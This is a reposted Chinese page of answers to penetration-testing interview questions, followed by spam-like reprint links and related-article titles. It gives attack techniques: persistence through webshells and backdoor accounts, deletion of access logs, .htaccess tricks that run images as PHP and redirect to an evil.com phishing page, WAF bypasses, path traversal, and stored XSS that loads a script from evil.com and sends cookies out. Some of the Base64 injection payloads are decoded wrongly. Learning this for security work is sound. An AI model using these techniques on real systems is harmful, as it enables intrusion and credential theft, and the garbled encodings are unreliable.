当前位置: 首页 > news >正文

2025年渗透测试面试题总结-60(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

2. 网站渗透测试流程

3. CMS识别意义

4. 扫目录在安全CMS中的意义

5. 常见服务器容器

6. 容器解析漏洞案例

7. 常见漏洞原理与渗透手法

8. 操作系统识别技巧

9. MySQL仅开放80端口的可能原因

10. 3389无法连接的排查

11. 突破字符转义的注入方法

12. .htaccess文件利用场景

13. WAF绕过方法

14. 避免带空格目录的原因

15. 审查上传点元素的意义

16. "用户不存在"漏洞利用

17. .do文件+路径参数利用思路

18. 目录结构已知的渗透思路

19. XSS长久控制方法

20. 读取管理员星号密码

21. 上传图片正常但脚本403的原因

22. 通过审查元素识别防护软件

23. 变形注入:demo.do?DATA=AjAxNg==

漏洞分析

手工验证步骤

防御建议总结

2、拿到一个待检测的站,你觉得应该先做什么(一个网站的渗透测试思路,流程
3、判断出网站的CMS对渗透有什么意义?
4、一个成熟并且相对安全的CMS,渗透时扫目录的意义?
5、常见的网站服务器容器。
6、目前已知哪些版本的容器有解析漏洞,具体举例。
7、简述SQL注入,XSS,CSRF漏洞的原理和渗透手法等
8、如何手工快速判断目标站是windows还是linux服务器?
9、为何一个mysql数据库的站,只有一个80端口开放?
10、3389无法连接的几种情况
11、如何突破注入时字符被转义?
12、拿到一个webshell发现网站根目录下有.htaccess文件,能做什么?
13、请写出突破Waf的方法
14、提权时选择可读写目录,为何尽量不用带空格的目录?
15、审查上传点的元素有什么意义?
16、目标站禁止注册用户,找回密码处随便输入用户名提示:“此用户不存在”,怎样利用?
17、目标站发现某txt的下载地址为.do?file=/upwdown/1.txt,有什么思路?
18、目标站,已知根目录下存在/abc/目录,并且此目录下存在编辑器和admin目录,思路
19、在有shell的情况下,如何使用xss实现对目标站的长久控制?
20、后台修改管理员密码处,原密码显示为*。你觉得该怎样实现读出这个用户的密码?
21、目标站无防护,上传图片可以正常访问,上传脚本格式访问则403.什么原因?
22、审查元素得知网站所使用的防护软件,你觉得怎样做到的?
23、以下链接存在 sql 注入漏洞,对于这个变形注入,你有什么思路?
demo.do?DATA=AjAxNg==

2. 网站渗透测试流程

  1. 信息收集
    • 域名/IP信息(Whois、CDN检测)
    • 端口扫描(Nmap:443, 8080, 3306等高危端口)
    • 目录扫描(Dirsearch/Gobuster,重点扫描/admin, /backup, /api
    • CMS识别(Wappalyzer/WhatWeb)
  2. 漏洞探测
    • 自动化扫描(AWVS/Nessus初步筛查)
    • 手动验证(重点测试登录框、上传点、参数传递处)
  3. 渗透利用
    • 根据漏洞类型选择利用方式(如SQL注入工具sqlmap、XSS平台)
  4. 权限维持
    • 上传Webshell(冰蝎/哥斯拉)
    • 添加后门账户/计划任务
  5. 痕迹清理
    • 删除访问日志(Apache: access.log; Nginx: nginx.conf 指定路径)

3. CMS识别意义

  • 针对性利用:已知CMS漏洞快速利用(如ThinkPHP RCE、WordPress插件漏洞)
  • 减少攻击面:避免盲目扫描,聚焦CMS特有路径(如Drupal的/user/login
  • 版本关联漏洞:通过版本号查询历史漏洞(CVE-2023-xxxx)

4. 扫目录在安全CMS中的意义

  • 敏感文件泄露
    • 配置文件(/web.config, /config.php.bak
    • 备份文件(/database.sql.zip
  • 隐藏入口发现
    • 未授权访问后台(/admin.php, /wp-admin
    • 测试页面(/test/, /demo/
  • 资产测绘:识别编辑器路径(如UEditor的/ueditor/

5. 常见服务器容器

容器名称使用场景特点
Apache传统Web应用.htaccess文件控制
Nginx高并发反向代理静态资源处理高效
IISWindows环境支持ASP.NET
TomcatJava Web应用默认端口8080
OpenResty动态脚本扩展Nginx集成Lua脚本能力

6. 容器解析漏洞案例

容器/版本漏洞形式Payload示例
IIS 6.0目录解析漏洞/logo.jpg/xxx.php
Nginx 0.8.x文件名逻辑漏洞test.jpg%00.php
Apache 1.x-2.x多后缀解析漏洞shell.php.jpg

7. 常见漏洞原理与渗透手法

漏洞类型原理渗透手法
SQL注入用户输入拼接到SQL语句' OR 1=1-- 联合查询注入
XSS恶意脚本注入页面<script>alert(1)</script> DOM型XSS
CSRF诱骗用户执行非预期操作构造恶意表单+社工诱导点击

8. 操作系统识别技巧

  • Linux特征
    • 路径大小写敏感(访问/Test vs /test
    • HTTP响应头含LinuxApache/2.x
  • Windows特征
    • 路径分隔符为\(如报错信息)
    • IIS服务器标识(Server: Microsoft-IIS/10.0

9. MySQL仅开放80端口的可能原因

  • 防火墙策略:仅允许HTTP流量(端口80)
  • 端口复用:通过HTTP隧道通信(如使用reGeorg代理)
  • 云安全组限制:仅暴露Web端口

10. 3389无法连接的排查

  1. 网络层问题
    • 防火墙拦截(本地或云安全组)
    • 端口修改(注册表HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp的Port值)
  2. 系统配置问题
    • 远程桌面服务未启动(services.msc 中检查TermService)
    • 用户权限限制(组策略禁用远程连接)

11. 突破字符转义的注入方法

  • 编码绕过
    • URL编码:'%27
    • 双重URL编码:%27%2527
  • 替代字符
    • 使用||替代OR(MySQL)
    • 内联注释:/*!SELECT*/
  • 字符串截断
    • 利用SUBSTRING()MID()函数逐位判断

12. .htaccess文件利用场景

  • 重定向攻击
    apacheRewriteEngine On RewriteRule ^login$ http://evil.com/phishing.html [R=302] 
  • 执行恶意脚本
    apacheAddHandler application/x-httpd-php .jpg # 将jpg解析为PHP 
  • 禁用安全功能
    apacheSecFilterEngine Off # 关闭ModSecurity 

13. WAF绕过方法

  • 请求拆分
    • 分块传输编码(Chunked Encoding)
    • HTTP参数污染(?id=1&id=UNION SELECT 1,2,3
  • 混淆技术
    • Unicode编码:SELECT\u0053\u0045\u004C\u0045\u0043\u0054
    • 注释填充:SEL/*xyz*/ECT
  • 资源限制绕过
    • 慢速攻击(低速发送Payload)

14. 避免带空格目录的原因

  • 路径解析歧义
    • Windows中C:\Program Files需引号包裹("C:\Program Files\..."
    • Linux中空格需转义(/tmp/my\ dir/
  • 脚本兼容性
    • 批处理/Bash脚本易因空格截断命令

15. 审查上传点元素的意义

  • 前端校验绕过
    • 删除accept=".jpg"属性或修改onchange事件函数
  • 隐藏参数分析
    • 发现未公开参数(如type=admin
  • JS加密逻辑
    • 提取加密密钥或逆向算法(如文件名MD5校验)

16. "用户不存在"漏洞利用

  • 用户名枚举
    • 爆破有效用户名(Burp Intruder比对响应长度)
  • 密码重置劫持
    • 对有效用户发起重置请求,截取邮件/SMS验证码

17. .do文件+路径参数利用思路

  1. 路径遍历
    • file=../../../../etc/passwd(测试Linux)
  2. 文件包含
    • file=WEB-INF/web.xml (读取Java配置)
  3. 后缀解析漏洞
    • 尝试file=/upwdown/1.txt.jsp (容器解析漏洞)

18. 目录结构已知的渗透思路

  1. 编辑器漏洞利用
    • 上传图片马 → 解析漏洞获取Shell
  2. 后台爆破
    • 尝试弱口令(admin/admin123)
  3. 敏感文件扫描
    • 查找/abc/admin/backup.sql

19. XSS长久控制方法

  • 持久化存储
    • 存储型XSS写入后台公告(<script src="http://evil.com/backdoor.js">
  • 结合CSRF
    • 定时向攻击服务器发送Cookie(setInterval+fetch
  • 键盘记录器
    • 通过XSS注入键盘监听脚本

20. 读取管理员星号密码

  • 前端源码分析
    • 检查input标签的value属性(可能硬编码)
  • DOM修改
    • 浏览器控制台执行:document.getElementById("pwd").type="text"
  • 流量拦截
    • Burp Suite抓取修改密码时的明文请求

21. 上传图片正常但脚本403的原因

  • 文件类型校验
    • MIME类型检测(Content-Type: image/jpeg
  • 文件头检测
    • 服务器检查文件幻数(如FF D8 FF E0为JPEG)
  • WAF规则拦截
    • 过滤<?php, <script>等关键词

22. 通过审查元素识别防护软件

  • 特征标识
    • HTML注释(如<!-- Safedog -->
    • JS文件路径(/waf/scripts.js
  • 响应头特征
    • Server: WAF/2.0X-Protected-By: ModSecurity
  • 拦截页面内容
    • 403页面包含防护品牌(如阿里云盾、Cloudflare)

23. 变形注入:demo.do?DATA=AjAxNg==

漏洞分析
  • 参数特性
    • DATA参数为Base64编码(AjAxNg=="2016"
  • 变形注入思路
    1. 二次编码绕过
      • 将Payload先Base64编码再传递:
      httpDATA=JyBPUiAxPTEgLS0+ # 原始Payload: ' OR 1=1 -- 
    2. 时间盲注构造
      • 使用SLEEP()函数:IF(1=1,SLEEP(5),0) → Base64编码
    3. 容器特性利用
      • 尝试%00截断(需容器支持)
手工验证步骤
http原始请求: demo.do?DATA=MjAxNg== # "2016" 测试注入: demo.do?DATA=JyBPUiAxPTEgLS0+ # 期望返回所有数据 

防御建议总结

  1. 输入过滤:对所有参数进行白名单校验
  2. 错误处理:禁用详细报错(防止信息泄露)
  3. 最小权限:数据库账户禁止FILE/EXECUTE权限
  4. WAF策略:部署正则规则过滤编码后的攻击特征

文章转载自:

http://Fdl1EUdk.ghxzd.cn
http://dWtxlwk1.ghxzd.cn
http://grZ7AibA.ghxzd.cn
http://SOnSl9GT.ghxzd.cn
http://Dk05Zr05.ghxzd.cn
http://CWWof5fg.ghxzd.cn
http://LrgNSiil.ghxzd.cn
http://pKfndBrH.ghxzd.cn
http://sOiJe0dd.ghxzd.cn
http://nMlbYXZJ.ghxzd.cn
http://YWKoxSXy.ghxzd.cn
http://pDqa62mU.ghxzd.cn
http://xaYMd8cU.ghxzd.cn
http://zrTMih2g.ghxzd.cn
http://xQ5UfW8q.ghxzd.cn
http://BCQALBAP.ghxzd.cn
http://qjkSvCld.ghxzd.cn
http://CqVHAG9v.ghxzd.cn
http://KBdhpeW8.ghxzd.cn
http://d8lctDij.ghxzd.cn
http://FFD4P1zh.ghxzd.cn
http://W8J4tEwG.ghxzd.cn
http://M1dUtXim.ghxzd.cn
http://djtRyppB.ghxzd.cn
http://oMA76Au8.ghxzd.cn
http://JxW3gboh.ghxzd.cn
http://8EsLUwNd.ghxzd.cn
http://OUMGmLhM.ghxzd.cn
http://ymq1rhwW.ghxzd.cn
http://WGgl9mhw.ghxzd.cn
http://www.dtcms.com/a/375210.html

相关文章:

  • 【GD32】ROM Bootloader、自定义Bootloader区别
  • 业务用例和系统用例
  • Google AI Mode 颠覆传统搜索方式,它是有很大可能的
  • MTC出席SAP大消费峰会:行业深度×全球广度×AI创新,助力韧性增长
  • 彩笔运维勇闯机器学习--决策树
  • 成都金牛区哪里租好办公室?国际数字影像产业园享税收优惠
  • vue3 实现将页面生成 pdf 导出(html2Canvas + jspdf)
  • golang 面试常考题
  • 单例模式(C++)
  • All in AI之二:数学体系的建立
  • 【Python】S1 基础篇 P5 字典模块指南
  • MySQL底层架构设计原理详细介绍
  • 《ServiceMesh落地避坑指南:从智慧园区故障看Envoy配置治理》
  • 【ARMv7-M】复位向量与启动过程
  • SQL面试题及详细答案150道(136-150) --- 性能优化与数据库设计篇
  • CMake Qt程序打包与添加图标详细教程
  • 【MySQL】mysql-connector-cpp使用
  • Oracle RAC认证矩阵:规避风险的关键指南
  • CTF-Web手的百宝箱
  • Django高效查询:values_list实战详解
  • Redis核心数据结构
  • 海外代理IP平台Top3评测:LoongProxy、神龙动态IP、IPIPGO哪家更适合你?
  • 开发避坑指南(43):idea2025.1.3版本启动springboot服务输入jvm参数解决办法
  • Vue3入门到实战,最新版vue3+TypeScript前端开发教程,笔记03
  • 四元数 (Quaternion)与李群SE(3)知识点(1)
  • 【Java】NIO 简单介绍
  • Qt从小白到进阶:完整学习路线与资源指南(补充)
  • 结合大数据知识体系对仓库建模方法总结
  • AI 辅助文档生成:从接口注释到自动化 API 文档上线
  • Day 18: 多模态大模型专项 - 理论深度与面试精通之路